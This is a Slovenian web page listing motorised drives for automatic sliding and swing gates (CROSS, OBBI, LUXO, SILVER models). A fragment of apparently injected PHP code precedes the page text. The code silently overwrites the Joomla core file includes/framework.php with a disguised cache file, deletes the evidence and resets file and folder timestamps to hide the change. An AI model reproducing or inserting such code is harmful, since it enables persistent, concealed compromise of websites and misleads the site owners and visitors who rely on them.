$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Avtomatska vrata - FREEZE SYSTEM - Motorizirani pogoni

Motorizirani pogoni

Motorizirani pogoni

Vsaka avtomatska vrata, pa ne glede na to, če so drsna ali krilna potrebujejo pogon, ki jih premika. Zato ponujamo:

POGONI ZA DRSNA VRATA

  • CROSS 3E - za vrata do skupne teže 300 kg
  • CROSS 5E, 7E, 7EH, 8E - za vrata do 400, 600 in 800 kg
  • CROSS 14, 15 - za vrata do 1400 in 1500 kg
  • CROSS 30, 30E - za vrata do 3000 kg
  • CROSS POGONI

POGONI ZA KRILNA VRATA

  • OBBI - za do 3m široko krilo
  • LUXO - za krilo do širine 5 m za vrata, ki se veliko uporabljajo
  • SILVER - za krilo do širine 3,5 m - 5 m
  • FACIL - ARC

TALNI POGONI